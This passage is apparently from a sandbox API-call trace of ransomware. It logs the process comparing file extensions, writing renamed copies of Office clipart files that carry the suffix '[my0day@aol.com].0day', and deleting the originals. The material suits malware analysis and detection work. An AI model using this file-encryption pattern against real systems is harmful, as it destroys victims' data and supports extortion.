lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString=".docx") returned 5 [0271.464] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.464] lstrlenW (lpString=".pdf") returned 4 [0271.464] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString=".xls") returned 4 [0271.464] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.464] lstrlenW (lpString=".xlsx") returned 5 [0271.464] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.464] lstrlenW (lpString=".ppt") returned 4 [0271.464] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.465] lstrlenW (lpString=".zip") returned 4 [0271.465] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.465] lstrlenW (lpString=".rar") returned 4 [0271.465] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.465] lstrlenW (lpString=".bz2") returned 4 [0271.465] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.465] lstrlenW (lpString=".7z") returned 3 [0271.465] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.465] lstrlenW (lpString=".dbf") returned 4 [0271.465] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.465] lstrlenW (lpString=".1cd") returned 4 [0271.465] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.465] lstrlenW (lpString=".jpg") returned 4 [0271.465] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.465] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.465] lstrlenW (lpString="BS01080_.WMF") returned 12 [0271.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.466] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2732) returned 1 [0271.466] CloseHandle (hObject=0x388) returned 1 [0271.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 0x20 [0271.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.466] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.466] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.467] GetLastError () returned 0x0 [0271.467] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xaac, lpOverlapped=0x0) returned 1 [0271.469] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0271.470] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.470] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.470] SetEndOfFile (hFile=0x3a0) returned 1 [0271.470] CloseHandle (hObject=0x3a0) returned 1 [0271.470] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.470] SetEndOfFile (hFile=0x388) returned 1 [0271.473] CloseHandle (hObject=0x388) returned 1 [0271.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0271.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.473] lstrlenW (lpString=".doc") returned 4 [0271.473] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString=".docx") returned 5 [0271.474] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.474] lstrlenW (lpString=".pdf") returned 4 [0271.474] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString=".xls") returned 4 [0271.474] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.474] lstrlenW (lpString=".xlsx") returned 5 [0271.474] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.474] lstrlenW (lpString=".ppt") returned 4 [0271.474] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.474] lstrlenW (lpString=".zip") returned 4 [0271.474] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.474] lstrlenW (lpString=".rar") returned 4 [0271.474] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString=".bz2") returned 4 [0271.474] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString=".7z") returned 3 [0271.474] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.474] lstrlenW (lpString=".dbf") returned 4 [0271.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.474] lstrlenW (lpString=".1cd") returned 4 [0271.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.474] lstrlenW (lpString=".jpg") returned 4 [0271.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString=".doc") returned 4 [0271.475] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".docx") returned 5 [0271.475] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.475] lstrlenW (lpString=".pdf") returned 4 [0271.475] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".xls") returned 4 [0271.475] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.475] lstrlenW (lpString=".xlsx") returned 5 [0271.475] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.475] lstrlenW (lpString=".ppt") returned 4 [0271.475] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString=".zip") returned 4 [0271.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.475] lstrlenW (lpString=".rar") returned 4 [0271.475] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".bz2") returned 4 [0271.475] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".7z") returned 3 [0271.475] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString=".dbf") returned 4 [0271.475] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString=".1cd") returned 4 [0271.475] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0271.475] lstrlenW (lpString=".jpg") returned 4 [0271.475] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.476] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.476] lstrlenW (lpString="BS01603_.WMF") returned 12 [0271.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.477] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=7176) returned 1 [0271.477] CloseHandle (hObject=0x388) returned 1 [0271.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 0x20 [0271.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.477] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.477] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.478] GetLastError () returned 0x0 [0271.478] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x1c08, lpOverlapped=0x0) returned 1 [0271.479] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.481] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.481] SetEndOfFile (hFile=0x3a0) returned 1 [0271.481] CloseHandle (hObject=0x3a0) returned 1 [0271.481] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.481] SetEndOfFile (hFile=0x388) returned 1 [0271.484] CloseHandle (hObject=0x388) returned 1 [0271.484] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.484] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.484] lstrlenW (lpString=".doc") returned 4 [0271.484] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.484] lstrlenW (lpString=".docx") returned 5 [0271.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.485] lstrlenW (lpString=".pdf") returned 4 [0271.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".xls") returned 4 [0271.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.485] lstrlenW (lpString=".xlsx") returned 5 [0271.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.485] lstrlenW (lpString=".ppt") returned 4 [0271.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString=".zip") returned 4 [0271.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.485] lstrlenW (lpString=".rar") returned 4 [0271.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".bz2") returned 4 [0271.485] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".7z") returned 3 [0271.485] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString=".dbf") returned 4 [0271.485] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString=".1cd") returned 4 [0271.485] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString=".jpg") returned 4 [0271.485] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.485] lstrlenW (lpString=".doc") returned 4 [0271.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.485] lstrlenW (lpString=".docx") returned 5 [0271.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.486] lstrlenW (lpString=".pdf") returned 4 [0271.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".xls") returned 4 [0271.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.486] lstrlenW (lpString=".xlsx") returned 5 [0271.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.486] lstrlenW (lpString=".ppt") returned 4 [0271.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.486] lstrlenW (lpString=".zip") returned 4 [0271.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.486] lstrlenW (lpString=".rar") returned 4 [0271.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".bz2") returned 4 [0271.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.486] lstrlenW (lpString=".7z") returned 3 [0271.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.531] lstrlenW (lpString=".dbf") returned 4 [0271.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.531] lstrlenW (lpString=".1cd") returned 4 [0271.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0271.531] lstrlenW (lpString=".jpg") returned 4 [0271.531] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.531] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.531] lstrlenW (lpString="BS01635_.WMF") returned 12 [0271.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.951] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=14996) returned 1 [0271.951] CloseHandle (hObject=0x384) returned 1 [0271.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 0x20 [0271.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.975] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.975] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.976] GetLastError () returned 0x0 [0271.976] ReadFile (in: hFile=0x318, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x3a94, lpOverlapped=0x0) returned 1 [0272.007] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x3aa0, lpOverlapped=0x0) returned 1 [0272.008] ReadFile (in: hFile=0x318, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.008] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.008] SetEndOfFile (hFile=0x380) returned 1 [0272.013] CloseHandle (hObject=0x380) returned 1 [0272.013] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.013] SetEndOfFile (hFile=0x318) returned 1 [0272.015] CloseHandle (hObject=0x318) returned 1 [0272.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0272.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.043] lstrlenW (lpString=".doc") returned 4 [0272.043] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.043] lstrlenW (lpString=".docx") returned 5 [0272.044] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.044] lstrlenW (lpString=".pdf") returned 4 [0272.044] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString=".xls") returned 4 [0272.044] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.044] lstrlenW (lpString=".xlsx") returned 5 [0272.044] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.044] lstrlenW (lpString=".ppt") returned 4 [0272.044] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString=".zip") returned 4 [0272.044] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.044] lstrlenW (lpString=".rar") returned 4 [0272.044] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString=".bz2") returned 4 [0272.044] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString=".7z") returned 3 [0272.044] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString=".dbf") returned 4 [0272.044] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString=".1cd") returned 4 [0272.044] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString=".jpg") returned 4 [0272.044] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.044] lstrlenW (lpString=".doc") returned 4 [0272.044] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString=".docx") returned 5 [0272.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.045] lstrlenW (lpString=".pdf") returned 4 [0272.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString=".xls") returned 4 [0272.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.045] lstrlenW (lpString=".xlsx") returned 5 [0272.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.045] lstrlenW (lpString=".ppt") returned 4 [0272.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0272.045] lstrlenW 